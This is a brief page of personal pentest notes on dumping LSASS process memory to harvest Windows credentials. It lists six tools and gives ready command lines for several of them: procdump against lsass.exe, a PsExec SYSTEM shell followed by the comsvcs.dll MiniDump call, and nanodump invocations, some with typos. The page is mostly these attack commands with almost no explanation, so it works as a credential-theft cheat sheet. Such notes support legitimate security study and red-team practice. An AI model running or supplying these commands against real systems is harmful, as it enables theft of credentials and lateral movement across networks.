HTBGitHubLinkedInNotion (Writeups)

LSASS Dumping

LSASS - Techniques

  • Task Manager

  • Procdump

  • System Informer

  • Comsvcs.dll

  • Nanodump

  • Dumpert

Lsass Dump: Task Manager

procdump.exe -accepteula -ma lsass.exe lsadump.dmp

Lsass Dump: System Informer

Lsass Dump: Comsvcs.dll

./PsExec -i -d -s cmd.exe
C:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Users\<user>\Documente\cred_tools\lsass_dump\dmp\lsass.dmp full

Lsass Dump: Nanodump

./nanodump.x64.exe --write normal_lsass.dmp
./nanodump.x64.exe --silen-process-exit .\wer_lsas

Lsass Dump: Dumpert

Outflank-Dumpert.exe
PreviousLSA SecretsNextExtracting Credential Offline

Last updated